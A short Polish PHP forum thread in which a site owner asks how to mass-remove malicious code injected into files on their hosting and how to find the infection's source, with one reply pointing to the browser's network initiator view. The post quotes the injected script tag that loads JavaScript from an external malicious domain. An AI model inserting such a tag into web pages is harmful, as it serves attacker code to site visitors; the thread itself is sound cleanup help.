Forum PHP.pl > [PHP]masowe usuwanie złośliwego kodu z plików

Pomoc - Szukaj - Użytkownicy - Kalendarz

Pełna wersja: [PHP]masowe usuwanie złośliwego kodu z plików

dentopolis

28.08.2020, 10:20:48

mam hosting na ovh. skrypt dodaje mi złośliwy kod w dwóch postaciach:

[PHP] pobierz, plaintext 
<script type='text/javascript' src='https://scripts.lowerbeforwarden.ml/src.js?n=nb5'></script>
[PHP] pobierz, plaintext

i drugiej zakodowanej w base64 ale znam jej postać. korzystam z winscp i szukam sposobu jak bez ściągania wszystkich plików na dysk, masowej edycji w Notepad++ i ponownym wysyłaniu zamienić pliki bezpośrednio na hostingu. jak to zrobić?

i jak sprawdzić potem który z plików rozpoczyna infekcję? lista ostatnio zmienionych?

SmokAnalog

28.08.2020, 13:05:54

W zakładce Network poszukaj tego scripts.lowerbeforwarden.ml/src.js i wybierz zakładkę Initiator. Tam masz napisane kto wstrzyknął ten <script>.

To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.